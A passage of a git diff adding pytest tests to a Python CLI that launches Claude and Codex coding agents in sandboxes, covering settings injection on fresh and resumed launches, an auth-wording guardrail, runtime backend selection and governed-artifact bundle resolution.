not None + import json as _json + + parsed = _json.loads(plan.agent_settings.rendered_bytes) + assert parsed == {} + + def test_team_a_to_team_b_transition(self, tmp_path: Path) -> None: + """D038: teamA→teamB fresh launch writes new team config. + + Simulates: team A settings were injected on a prior launch. + A new fresh launch with team B writes team B's settings, + replacing whatever was in the volume. + """ + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + _raw = { + "defaults": {}, + "profiles": {"beta": {"network_policy": "open"}}, + } + # Not standalone/offline — so sync runs and produces team B settings + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team="beta", + session_name=None, + resume=False, + fresh=False, + offline=False, + standalone=False, + dry_run=False, + allow_suspicious=False, + org_config=NormalizedOrgConfig.from_dict(_raw), + raw_org_config=_raw, + provider_id="claude", + ) + resolver_result = _build_resolver_result(workspace_path) + sync_result = SyncResult( + success=True, + rendered_settings={"plugins": ["team-b-plugin"]}, + ) + dependencies = _build_dependencies(FakeGitClient()) + + with ( + patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ), + patch( + "scc_cli.application.start_session.sync_marketplace_settings", + return_value=sync_result, + ), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + # Fresh launch with team B config written + assert plan.agent_settings is not None + import json as _json + + parsed = _json.loads(plan.agent_settings.rendered_bytes) + assert parsed == {"plugins": ["team-b-plugin"]} + + def test_settings_to_no_settings_transition(self, tmp_path: Path) -> None: + """D038: prior launch had settings, new fresh launch has no settings content. + + The empty config write clears the stale governed config from + the persistent volume. + """ + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + _raw = { + "defaults": {}, + "profiles": {"alpha": {}}, + } + request = self._make_request( + workspace_path, + resume=False, + team="alpha", + org_config=NormalizedOrgConfig.from_dict(_raw), + raw_org_config=_raw, + ) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with ( + patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ), + patch( + "scc_cli.application.start_session.sync_marketplace_settings", + return_value=SyncResult(success=True, rendered_settings=None), + ), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + # Even with no rendered settings, fresh launch writes empty config + assert plan.agent_settings is not None + import json as _json + + parsed = _json.loads(plan.agent_settings.rendered_bytes) + assert parsed == {} + + def test_resume_with_team_still_skips_settings(self, tmp_path: Path) -> None: + """D038: resume with team config available still skips injection.""" + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + _raw = { + "defaults": {}, + "profiles": {"alpha": {}}, + } + request = self._make_request( + workspace_path, + resume=True, + team="alpha", + org_config=NormalizedOrgConfig.from_dict(_raw), + raw_org_config=_raw, + ) + resolver_result = _build_resolver_result(workspace_path) + dependencies = _build_dependencies(FakeGitClient()) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.agent_settings is None + + def test_codex_fresh_launch_empty_config_includes_scc_defaults(self, tmp_path: Path) -> None: + """D038+D040: Codex fresh launch with no content still gets SCC-managed defaults. + + The CodexAgentRunner.build_settings merges _SCC_MANAGED_DEFAULTS + (cli_auth_credentials_store='file') even into an empty config dict. + """ + from scc_cli.adapters.codex_agent_runner import CodexAgentRunner + + workspace_path = tmp_path / "workspace" + workspace_path.mkdir() + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="codex", + ) + resolver_result = _build_resolver_result(workspace_path) + from scc_cli.adapters.codex_agent_provider import CodexAgentProvider + + dependencies = StartSessionDependencies( + filesystem=MagicMock(), + remote_fetcher=MagicMock(), + clock=MagicMock(), + git_client=FakeGitClient(), + agent_runner=CodexAgentRunner(), + agent_provider=CodexAgentProvider(), + sandbox_runtime=FakeSandboxRuntime(), + resolve_effective_config=MagicMock(), + materialize_marketplace=MagicMock(), + ) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.agent_settings is not None + content = plan.agent_settings.rendered_bytes.decode() + assert "cli_auth_credentials_store" in content + assert "file" in content + assert plan.agent_settings.suffix == ".toml" + + def test_codex_worktree_launch_scopes_settings_to_workspace_not_mount_root( + self, tmp_path: Path + ) -> None: + """D041: worktree launches must write Codex config into the workspace root.""" + from scc_cli.adapters.codex_agent_provider import CodexAgentProvider + from scc_cli.adapters.codex_agent_runner import CodexAgentRunner + + mount_root = tmp_path / "repo-parent" + workspace_path = mount_root / "worktree-a" + workspace_path.mkdir(parents=True) + request = StartSessionRequest( + workspace_path=workspace_path, + workspace_arg=str(workspace_path), + entry_dir=workspace_path, + team=None, + session_name=None, + resume=False, + fresh=False, + offline=True, + standalone=True, + dry_run=False, + allow_suspicious=False, + org_config=None, + provider_id="codex", + ) + resolver_result = ResolverResult( + workspace_root=workspace_path, + entry_dir=workspace_path, + mount_root=mount_root, + container_workdir=str(workspace_path), + is_auto_detected=False, + is_suspicious=False, + reason="test-worktree", + ) + dependencies = StartSessionDependencies( + filesystem=MagicMock(), + remote_fetcher=MagicMock(), + clock=MagicMock(), + git_client=FakeGitClient(), + agent_runner=CodexAgentRunner(), + agent_provider=CodexAgentProvider(), + sandbox_runtime=FakeSandboxRuntime(), + resolve_effective_config=MagicMock(), + materialize_marketplace=MagicMock(), + ) + + with patch( + "scc_cli.application.start_session.resolve_workspace", + return_value=WorkspaceContext(resolver_result), + ): + plan = prepare_start_session(request, dependencies=dependencies) + + assert plan.agent_settings is not None + assert plan.agent_settings.path == workspace_path / ".codex" / "config.toml" diff --git a/tests/test_auth_vocabulary_guardrail.py b/tests/test_auth_vocabulary_guardrail.py new file mode 100644 index 0000000..6e00042 --- /dev/null +++ b/tests/test_auth_vocabulary_guardrail.py @@ -0,0 +1,257 @@ +"""Guardrail: prevent misleading auth/readiness vocabulary in user-facing strings. + +After M008-S02 vocabulary cleanup, user-facing strings must use the canonical +three-tier readiness vocabulary: + + Tier 1: "auth cache present" / "auth cache missing" + — when we only check file existence (not validity or connectivity) + + Tier 2: "image available" / "image not found" + — when we check whether the provider image exists locally + + Tier 3: "launch-ready" + — ONLY when BOTH auth cache + image are confirmed present + +Banned patterns: + - "connected" used to describe auth-cache presence (misleading — implies + live connectivity verification, but we only check file existence) + - "sign-in required" (should be "sign-in needed" — "required" suggests + a hard gate, but the user can skip/defer) + - standalone "ready" meaning only one tier was checked (should not say + "ready" when only auth OR only image was verified) + - "not connected" as auth-cache absence wording (misleading — see above) +""" + +from __future__ import annotations + +import re +import tokenize +from pathlib import Path + +ROOT = Path(__file__).resolve().parents[1] +SRC = ROOT / "src" / "scc_cli" + +# Directories containing user-facing string modules +_UI_DIRS = [ + SRC / "commands", + SRC / "doctor", + SRC / "ui", +] + +# Also scan setup.py at package root +_EXTRA_FILES = [ + SRC / "setup.py", +] + +# Files that legitimately use banned terms in variable names, docstrings, +# or non-user-facing contexts — excluded from the scan. +_EXCLUDED_STEMS = { + # Internal error class definitions + "errors", + # Port/protocol definitions (docstrings describe semantics) + "agent_provider", + # Provider resolution internals (variable names like connected_provider_ids) + "provider_resolution", +} + + +def _collect_python_files() -> list[Path]: + """Collect all .py files from UI-facing directories plus extras.""" + files: list[Path] = [] + for d in _UI_DIRS: + if d.exists(): + files.extend(sorted(d.rglob("*.py"))) + for f in _EXTRA_FILES: + if f.exists(): + files.append(f) + return files + + +def _extract_string_tokens(path: Path) -> list[tuple[int, str]]: + """Extract (line_number, string_value) for all string tokens in a file. + + Uses the tokenize module to correctly isolate string literals from + variable names, comments, and other token types. + """ + results: list[tuple[int, str]] = [] + try: + with open(path, "rb") as fh: + for tok in tokenize.tokenize(fh.readline): + if tok.type == tokenize.STRING: + # Evaluate the string literal to get the raw value + try: + val = eval(tok.string) # noqa: S307 + if isinstance(val, str): + results.append((tok.start[0], val)) + except Exception: + # f-strings or complex expressions — fall back to raw + results.append((tok.start[0], tok.string)) + except tokenize.TokenError: + pass + return results + + +# --------------------------------------------------------------------------- +# Banned vocabulary patterns — compiled regexes +# --------------------------------------------------------------------------- + +# Pattern 1: "connected" used as a status label for auth-cache presence. +# Matches strings that are exactly "connected" or "not connected" as status +# display values. Does NOT match variable names or longer phrases. +_CONNECTED_STATUS = re.compile( + r'^"?(not )?connected"?$' + r"|" + r'(?:status|label|value)\s*[:=]\s*["\'](?:not )?connected["\']', + re.IGNORECASE, +) + +# Pattern 2: "sign-in required" — should be "sign-in needed" +_SIGN_IN_REQUIRED = re.compile(r"sign-in required", re.IGNORECASE) + +# Pattern 3: standalone "ready" as sole auth readiness descriptor. +# This catches strings like '"ready"' used to describe auth-only status, +# but not compound terms like "launch-ready" or "not ready". +# We look for the word "ready" used as a display value in auth contexts. +_STANDALONE_READY_AUTH = re.compile( + r"""(?:["']ready["'])""" + r"|" + r"""(?:else\s+["'](?:not )?ready["'])""", +) + + +def test_no_connected_as_auth_status() -> None: + """User-facing strings must not use 'connected'/'not connected' for auth cache status.""" + violations: list[str] = [] + for path in _collect_python_files(): + if path.stem in _EXCLUDED_STEMS: + continue + for lineno, value in _extract_string_tokens(path): + # Check for exact "connected" or "not connected" as a status value + stripped = value.strip() + if stripped in ("connected", "not connected"): + violations.append( + f" {path.relative_to(ROOT)}:{lineno} — banned auth status string: {stripped!r}" + ) + assert not violations, ( + "Found 'connected'/'not connected' used as auth-cache status labels.\n" + "Use 'auth cache present' / 'sign-in needed' instead.\n" + "\n".join(violations) + ) + + +def test_no_sign_in_required() -> None: + """User-facing strings must use 'sign-in needed', not 'sign-in required'.""" + violations: list[str] = [] + for path in _collect_python_files(): + if path.stem in _EXCLUDED_STEMS: + continue + for lineno, value in _extract_string_tokens(path): + if _SIGN_IN_REQUIRED.search(value): + violations.append( + f" {path.relative_to(ROOT)}:{lineno} — contains 'sign-in required': {value!r}" + ) + assert not violations, ( + "Found 'sign-in required' in user-facing strings.\n" + "Use 'sign-in needed' instead.\n" + "\n".join(violations) + ) + + +def test_no_standalone_ready_for_auth_only() -> None: + """User-facing strings must not use bare 'ready' when only auth cache was checked. + + The word 'ready' alone implies full launch readiness (auth + image). + When only auth cache was verified, use 'auth cache present'. + When only the image was checked, use 'image available'. + Use 'launch-ready' only when both are confirmed. + """ + violations: list[str] = [] + + # Scan setup.py and provider_choice.py specifically — these are the + # known sites where auth readiness is displayed. + target_files = [ + SRC / "setup.py", + SRC / "commands" / "launch" / "provider_choice.py", + ] + + for path in target_files: + if not path.exists(): + continue + # Read raw lines for context-aware matching + lines = path.read_text().splitlines() + for i, line in enumerate(lines, start=1): + # Look for "ready" used as a display value in auth-check context + # Pattern: string literal "ready" near auth/provider readiness logic + if _STANDALONE_READY_AUTH.search(line): + # Allow "launch-ready" and "not ready" in error contexts + if "launch-ready" in line or "launch_ready" in line: + continue + # Allow the pattern in comments/docstrings + stripped = line.strip() + if ( + stripped.startswith("#") + or stripped.startswith('"""') + or stripped.startswith("'''") + ): + continue + violations.append( + f" {path.relative_to(ROOT)}:{i} — " + f"standalone 'ready' as auth status: {stripped!r}" + ) + + assert not violations, ( + "Found standalone 'ready' used as auth-only readiness status.\n" + "Use 'auth cache present' for auth-only, 'image available' for image-only, " + "'launch-ready' for both.\n" + "\n".join(violations) + ) + + +def test_doctor_auth_check_uses_truthful_vocabulary() -> None: + """Doctor auth check must use 'auth cache present' / 'auth cache missing' vocabulary.""" + env_path = SRC / "doctor" / "checks" / "environment.py" + assert env_path.exists(), f"Expected {env_path} to exist" + + content = env_path.read_text() + + # The positive case should say "auth cache present" + assert "auth cache present" in content, ( + "Doctor environment.py should contain 'auth cache present' for successful auth checks" + ) + + # The negative case should say "auth cache missing", not "not ready" or "not connected" + assert "auth cache missing" in content, ( + "Doctor environment.py should contain 'auth cache missing' for failed auth checks" + ) + + # Should NOT contain misleading terms for auth status + assert "not connected" not in content, ( + "Doctor environment.py should not use 'not connected' for auth cache absence" + ) + + +def test_auth_bootstrap_uses_truthful_vocabulary() -> None: + """Auth bootstrap messages must use 'auth cache' vocabulary. + + Canonical auth messaging lives in preflight.py._ensure_auth. + auth_bootstrap.py is a deprecated redirect with no user-facing text. + """ + preflight_path = SRC / "commands" / "launch" / "preflight.py" + assert preflight_path.exists(), f"Expected {preflight_path} to exist" + + content = preflight_path.read_text() + + # Should reference "auth cache" in user-facing messages + assert "auth cache" in content, ( + "preflight.py should reference 'auth cache' in user-facing messages" + ) + + # Should NOT use "connected" as auth status + assert '"connected"' not in content and "'connected'" not in content, ( + "preflight.py should not use 'connected' as auth status wording" + ) + + # auth_bootstrap.py still exists as a deprecated redirect + bootstrap_path = SRC / "commands" / "launch" / "auth_bootstrap.py" + assert bootstrap_path.exists(), "auth_bootstrap.py should exist as a deprecated redirect" + bootstrap_content = bootstrap_path.read_text() + assert "deprecated" in bootstrap_content.lower(), ( + "auth_bootstrap.py should be marked as deprecated" + ) diff --git a/tests/test_bootstrap.py b/tests/test_bootstrap.py index ce32cc9..415cb65 100644 --- a/tests/test_bootstrap.py +++ b/tests/test_bootstrap.py @@ -2,15 +2,24 @@ from __future__ import annotations +from dataclasses import replace + +import pytest + from scc_cli.adapters.claude_agent_runner import ClaudeAgentRunner from scc_cli.adapters.docker_sandbox_runtime import DockerSandboxRuntime +from scc_cli.adapters.local_audit_event_sink import LocalAuditEventSink from scc_cli.adapters.local_dependency_installer import LocalDependencyInstaller from scc_cli.adapters.local_filesystem import LocalFilesystem from scc_cli.adapters.local_git_client import LocalGitClient +from scc_cli.adapters.oci_sandbox_runtime import OciSandboxRuntime from scc_cli.adapters.personal_profile_service_local import LocalPersonalProfileService from scc_cli.adapters.requests_fetcher import RequestsFetcher from scc_cli.adapters.system_clock import SystemClock from scc_cli.bootstrap import DefaultAdapters, get_default_adapters +from scc_cli.commands.launch.dependencies import build_start_session_dependencies +from scc_cli.core.errors import InvalidLaunchPlanError, LaunchAuditUnavailableError +from tests.fakes import build_fake_adapters def test_get_default_adapters_returns_expected_types() -> None: @@ -23,5 +32,54 @@ def test_get_default_adapters_returns_expected_types() -> None: assert isinstance(adapters.remote_fetcher, RequestsFetcher) assert isinstance(adapters.clock, SystemClock) assert isinstance(adapters.agent_runner, ClaudeAgentRunner) - assert isinstance(adapters.sandbox_runtime, DockerSandboxRuntime) + assert isinstance(adapters.sandbox_runtime, (DockerSandboxRuntime, OciSandboxRuntime)) assert isinstance(adapters.personal_profile_service, LocalPersonalProfileService) + assert isinstance(adapters.audit_event_sink, LocalAuditEventSink) + + +# --------------------------------------------------------------------------- +# S01 seam boundary — these tests describe the target state for T02/T03. +# They are expected to fail until DefaultAdapters gains agent_provider wiring. +# --------------------------------------------------------------------------- + + +def test_default_adapters_exposes_agent_provider() -> None: + """DefaultAdapters should expose an agent_provider satisfying the AgentProvider protocol. + + This characterizes the S01 target: the composition root must wire a provider + adapter so the launch flow can call prepare_launch without importing Claude + internals directly. + """ + adapters = get_default_adapters() + + provider = adapters.agent_provider + + # The returned object must conform to AgentProvider protocol + assert hasattr(provider, "capability_profile") + assert hasattr(provider, "prepare_launch") + profile = provider.capability_profile() + assert profile.provider_id != "" + assert profile.required_destination_set != "" + + +def test_build_start_session_dependencies_requires_provider_wiring() -> None: + adapters = replace(build_fake_adapters(), agent_provider=None) + + with pytest.raises(InvalidLaunchPlanError, match="missing provider wiring"): + build_start_session_dependencies(adapters, provider_id="claude") + + +def test_build_start_session_dependencies_requires_audit_sink_wiring() -> None: + adapters = replace(build_fake_adapters(), audit_event_sink=None) + + with pytest.raises(LaunchAuditUnavailableError): + build_start_session_dependencies(adapters, provider_id="claude") + + +def test_build_start_session_dependencies_threads_provider_and_sink() -> None: + adapters = build_fake_adapters() + + dependencies = build_start_session_dependencies(adapters, provider_id="claude") + + assert dependencies.agent_provider is adapters.agent_provider + assert dependencies.audit_event_sink is adapters.audit_event_sink diff --git a/tests/test_bootstrap_backend_selection.py b/tests/test_bootstrap_backend_selection.py new file mode 100644 index 0000000..e12f695 --- /dev/null +++ b/tests/test_bootstrap_backend_selection.py @@ -0,0 +1,89 @@ +"""Tests for bootstrap backend selection based on runtime probe results.""" + +from __future__ import annotations + +from unittest.mock import patch + +import pytest + +from scc_cli.adapters.docker_sandbox_runtime import DockerSandboxRuntime +from scc_cli.adapters.oci_sandbox_runtime import OciSandboxRuntime +from scc_cli.bootstrap import get_default_adapters +from scc_cli.core.contracts import RuntimeInfo + + +def _make_runtime_info(preferred_backend: str, sandbox_available: bool = True) -> RuntimeInfo: + return RuntimeInfo( + runtime_id="docker", + display_name="Docker", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + daemon_reachable=True, + sandbox_available=sandbox_available, + preferred_backend=preferred_backend, + ) + + +@pytest.fixture(autouse=True) +def _clear_cache() -> None: + """Clear lru_cache before each test so probe results take effect.""" + get_default_adapters.cache_clear() + + +class TestBootstrapBackendSelection: + """Verify bootstrap selects the correct sandbox runtime from probe results.""" + + @patch("scc_cli.bootstrap.DockerRuntimeProbe") + def test_oci_backend_produces_oci_runtime(self, mock_probe_cls: object) -> None: + """When probe returns preferred_backend='oci', bootstrap wires OciSandboxRuntime.""" + info = _make_runtime_info("oci", sandbox_available=False) + mock_probe_cls.return_value.probe.return_value = info # type: ignore[union-attr] + + adapters = get_default_adapters() + + assert isinstance(adapters.sandbox_runtime, OciSandboxRuntime) + + @patch("scc_cli.bootstrap.DockerRuntimeProbe") + def test_docker_sandbox_backend_produces_docker_runtime(self, mock_probe_cls: object) -> None: + """When probe returns preferred_backend='docker-sandbox', bootstrap wires DockerSandboxRuntime.""" + info = _make_runtime_info("docker-sandbox", sandbox_available=True) + mock_probe_cls.return_value.probe.return_value = info # type: ignore[union-attr] + + adapters = get_default_adapters() + + assert isinstance(adapters.sandbox_runtime, DockerSandboxRuntime) + + @patch("scc_cli.bootstrap.DockerRuntimeProbe") + def test_none_backend_defaults_to_docker_runtime(self, mock_probe_cls: object) -> None: + """When preferred_backend is None (unknown), bootstrap defaults to DockerSandboxRuntime.""" + info = RuntimeInfo( + runtime_id="docker", + display_name="Docker", + cli_name="docker", + supports_oci=True, + supports_internal_networks=True, + supports_host_network=True, + daemon_reachable=True, + sandbox_available=True, + preferred_backend=None, + ) + mock_probe_cls.return_value.probe.return_value = info # type: ignore[union-attr] + + adapters = get_default_adapters() + + assert isinstance(adapters.sandbox_runtime, DockerSandboxRuntime) + + @patch("scc_cli.bootstrap.DockerRuntimeProbe") + def test_probe_is_passed_to_oci_runtime(self, mock_probe_cls: object) -> None: + """OciSandboxRuntime receives the same probe instance used for probing.""" + info = _make_runtime_info("oci") + mock_instance = mock_probe_cls.return_value + mock_instance.probe.return_value = info + + adapters = get_default_adapters() + + assert isinstance(adapters.sandbox_runtime, OciSandboxRuntime) + # The runtime probe should be the same probe instance + assert adapters.runtime_probe is mock_instance diff --git a/tests/test_bundle_resolver.py b/tests/test_bundle_resolver.py new file mode 100644 index 0000000..59c350d --- /dev/null +++ b/tests/test_bundle_resolver.py @@ -0,0 +1,839 @@ +"""Tests for bundle resolution: compute ArtifactRenderPlan from NormalizedOrgConfig. + +Covers: +- Basic resolution of single and multiple bundles +- Provider filtering (bindings present vs missing) +- Install intent filtering (disabled, request-only, required, available) +- Missing bundle / missing artifact diagnostics +- Portable artifacts (skills, MCP) with no binding still count as effective +- Native integrations without binding are skipped +- Team not found raises ValueError +- Empty enabled_bundles produces empty result +- Disabled bundle is skipped entirely +""" + +from __future__ import annotations + +import pytest + +from scc_cli.core.bundle_resolver import ( + BundleResolutionDiagnostic, + BundleResolutionResult, + resolve_render_plan, +) +from scc_cli.core.errors import ( + BundleResolutionError, + InvalidArtifactReferenceError, +) +from scc_cli.core.governed_artifacts import ( + ArtifactBundle, + ArtifactInstallIntent, + ArtifactKind, + ArtifactRenderPlan, + GovernedArtifact, + ProviderArtifactBinding, +) +from scc_cli.ports.config_models import ( + GovernedArtifactsCatalog, + NormalizedOrgConfig, + NormalizedTeamConfig, + OrganizationInfo, +) + +# --------------------------------------------------------------------------- +# Helpers +# --------------------------------------------------------------------------- + + +def _make_org( + *, + profiles: dict[str, NormalizedTeamConfig] | None = None, + catalog: GovernedArtifactsCatalog | None = None, +) -> NormalizedOrgConfig: + return NormalizedOrgConfig( + organization=OrganizationInfo(name="test-org"), + profiles=profiles or {}, + governed_artifacts=catalog or GovernedArtifactsCatalog(), + ) + + +def _make_team(name: str, bundles: tuple[str, ...] = ()) -> NormalizedTeamConfig: + return NormalizedTeamConfig(name=name, enabled_bundles=bundles) + + +# --------------------------------------------------------------------------- +# Team lookup +# --------------------------------------------------------------------------- + + +class TestTeamLookup: + def test_missing_team_raises_value_error(self) -> None: + org = _make_org(profiles={"alpha": _make_team("alpha")}) + with pytest.raises(ValueError, match="not found"): + resolve_render_plan(org, "nonexistent", "claude") + + def test_missing_team_lists_available(self) -> None: + org = _make_org(profiles={"alpha": _make_team("alpha"), "beta": _make_team("beta")}) + with pytest.raises(ValueError, match="alpha.*beta"): + resolve_render_plan(org, "nonexistent", "claude") + + +# --------------------------------------------------------------------------- +# Empty / no bundles +# --------------------------------------------------------------------------- + + +class TestEmptyBundles: + def test_no_enabled_bundles_returns_empty(self) -> None: + org = _make_org(profiles={"team-a": _make_team("team-a")}) + result = resolve_render_plan(org, "team-a", "claude") + assert result.plans == () + assert result.diagnostics == () + + def test_empty_catalog_with_bundle_ref(self) -> None: + """Team references a bundle but catalog is empty.""" + org = _make_org( + profiles={"team-a": _make_team("team-a", bundles=("missing-bundle",))}, + ) + result = resolve_render_plan(org, "team-a", "claude") + assert len(result.plans) == 1 + assert result.plans[0].effective_artifacts == () + assert len(result.diagnostics) == 1 + assert "not found" in result.diagnostics[0].reason + + +# --------------------------------------------------------------------------- +# Basic resolution +# --------------------------------------------------------------------------- + + +class TestBasicResolution: + def test_single_skill_required(self) -> None: + """A required skill with claude binding resolves to effective + binding.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "review-skill": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="review-skill", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + }, + bindings={ + "review-skill": ( + ProviderArtifactBinding(provider="claude", native_ref="skills/review"), + ), + }, + bundles={ + "dev-bundle": ArtifactBundle( + name="dev-bundle", + artifacts=("review-skill",), + install_intent=ArtifactInstallIntent.AVAILABLE, + ), + }, + ) + org = _make_org( + profiles={"team-a": _make_team("team-a", bundles=("dev-bundle",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "team-a", "claude") + + assert len(result.plans) == 1 + plan = result.plans[0] + assert plan.bundle_id == "dev-bundle" + assert plan.provider == "claude" + assert plan.effective_artifacts == ("review-skill",) + assert len(plan.bindings) == 1 + assert plan.bindings[0].provider == "claude" + assert plan.skipped == () + assert result.diagnostics == () + + def test_multiple_bundles(self) -> None: + """Two bundles produce two plans.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "skill-a": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="skill-a", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + "skill-b": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="skill-b", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + }, + bindings={}, + bundles={ + "bundle-1": ArtifactBundle( + name="bundle-1", + artifacts=("skill-a",), + ), + "bundle-2": ArtifactBundle( + name="bundle-2", + artifacts=("skill-b",), + ), + }, + ) + org = _make_org( + profiles={"team-a": _make_team("team-a", bundles=("bundle-1", "bundle-2"))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "team-a", "claude") + assert len(result.plans) == 2 + assert result.plans[0].bundle_id == "bundle-1" + assert result.plans[1].bundle_id == "bundle-2" + + def test_multiple_artifact_kinds_in_bundle(self) -> None: + """Bundle with skill + mcp_server + native_integration.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "my-skill": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="my-skill", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + "github-mcp": GovernedArtifact( + kind=ArtifactKind.MCP_SERVER, + name="github-mcp", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + "github-native": GovernedArtifact( + kind=ArtifactKind.NATIVE_INTEGRATION, + name="github-native", + install_intent=ArtifactInstallIntent.AVAILABLE, + ), + }, + bindings={ + "my-skill": (ProviderArtifactBinding(provider="claude", native_ref="skills/my"),), + "github-mcp": ( + ProviderArtifactBinding(provider="claude", native_ref="mcp/github"), + ), + "github-native": ( + ProviderArtifactBinding( + provider="claude", + native_config={"hooks": "./claude/hooks.json"}, + ), + ), + }, + bundles={ + "github-dev": ArtifactBundle( + name="github-dev", + artifacts=("my-skill", "github-mcp", "github-native"), + ), + }, + ) + org = _make_org( + profiles={"team-a": _make_team("team-a", bundles=("github-dev",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "team-a", "claude") + plan = result.plans[0] + assert plan.effective_artifacts == ("my-skill", "github-mcp", "github-native") + assert len(plan.bindings) == 3 + assert plan.skipped == () + + +# --------------------------------------------------------------------------- +# Provider filtering +# --------------------------------------------------------------------------- + + +class TestProviderFiltering: + def test_binding_only_for_other_provider(self) -> None: + """Native integration with only codex binding is skipped for claude.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "codex-only": GovernedArtifact( + kind=ArtifactKind.NATIVE_INTEGRATION, + name="codex-only", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + }, + bindings={ + "codex-only": ( + ProviderArtifactBinding(provider="codex", native_ref="plugins/codex"), + ), + }, + bundles={ + "test-bundle": ArtifactBundle( + name="test-bundle", + artifacts=("codex-only",), + ), + }, + ) + org = _make_org( + profiles={"team-a": _make_team("team-a", bundles=("test-bundle",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "team-a", "claude") + plan = result.plans[0] + assert plan.effective_artifacts == () + assert plan.skipped == ("codex-only",) + assert len(result.diagnostics) == 1 + assert "no binding for provider 'claude'" in result.diagnostics[0].reason + + def test_skill_without_binding_still_effective(self) -> None: + """Skills are portable — they count as effective even without a binding.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "portable-skill": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="portable-skill", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + }, + bindings={}, # no bindings at all + bundles={ + "test-bundle": ArtifactBundle( + name="test-bundle", + artifacts=("portable-skill",), + ), + }, + ) + org = _make_org( + profiles={"team-a": _make_team("team-a", bundles=("test-bundle",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "team-a", "claude") + plan = result.plans[0] + assert plan.effective_artifacts == ("portable-skill",) + assert plan.skipped == () + + def test_mcp_server_without_binding_still_effective(self) -> None: + """MCP servers are portable — effective even without provider binding.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "generic-mcp": GovernedArtifact( + kind=ArtifactKind.MCP_SERVER, + name="generic-mcp", + install_intent=ArtifactInstallIntent.REQUIRED, + ), + }, + bindings={}, + bundles={ + "test-bundle": ArtifactBundle( + name="test-bundle", + artifacts=("generic-mcp",), + ), + }, + ) + org = _make_org( + profiles={"team-a": _make_team("team-a", bundles=("test-bundle",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "team-a", "codex") + plan = result.plans[0] + assert plan.effective_artifacts == ("generic-mcp",) + + def test_both_providers_have_bindings(self) -> None: + """Each provider gets only its own bindings.""" + catalog = GovernedArtifactsCatalog( + artifacts={ + "github-native": GovernedArtifact( + kind=ArtifactKind.NATIVE_INTEGRATION, + name="github-native", + install_intent=ArtifactInstallIntent.AVAILABLE, + ), + }, + bindings={ + "github-native": ( + ProviderArtifactBinding( + provider="claude", + native_config={"hooks": "./claude/github-hooks.json"}, + ), + ProviderArtifactBinding( + provider="codex", + native_config={"rules": "./codex/rules/github.rules"}, + ), + ), + }, + bundles={ + "github": ArtifactBundle( + name="github", + artifacts=("github-native",), + ), + }, + ) + org = _make_org( + profiles={"team-a": _make_team("team-a", bundles=("github",))}, + catalog=catalog, + ) + + claude_result = resolve_render_plan(org, "team-a", "claude") + codex_result = resolve_render_plan(org, "team-a", "codex") + + assert len(claude_result.plans[0].bindings) == 1 + assert claude_result.plans[0].bindings[0].provider == "claude" + + assert len(codex_result.plans[0].bindings) == 1 + assert codex_result.plans[0].bindings[0].provider == "codex" + + +# --------------------------------------------------------------------------- +# Install intent filtering +# --------------------------------------------------------------------------- + + +class TestInstallIntentFiltering: + def test_disabled_artifact_skipped(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={ + "blocked-skill": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="blocked-skill", + install_intent=ArtifactInstallIntent.DISABLED, + ), + }, + bindings={}, + bundles={ + "test": ArtifactBundle(name="test", artifacts=("blocked-skill",)), + }, + ) + org = _make_org( + profiles={"t": _make_team("t", bundles=("test",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "t", "claude") + plan = result.plans[0] + assert plan.effective_artifacts == () + assert plan.skipped == ("blocked-skill",) + assert any("disabled" in d.reason for d in result.diagnostics) + + def test_request_only_artifact_skipped(self) -> None: + catalog = GovernedArtifactsCatalog( + artifacts={ + "pending-skill": GovernedArtifact( + kind=ArtifactKind.SKILL, + name="pending-skill", + install_intent=ArtifactInstallIntent.REQUEST_ONLY, + ), + }, + bindings={}, + bundles={ + "test": ArtifactBundle(name="test", artifacts=("pending-skill",)), + }, + ) + org = _make_org( + profiles={"t": _make_team("t", bundles=("test",))}, + catalog=catalog, + ) + result = resolve_render_plan(org, "t", "claude") + plan = result.plans[0] + assert 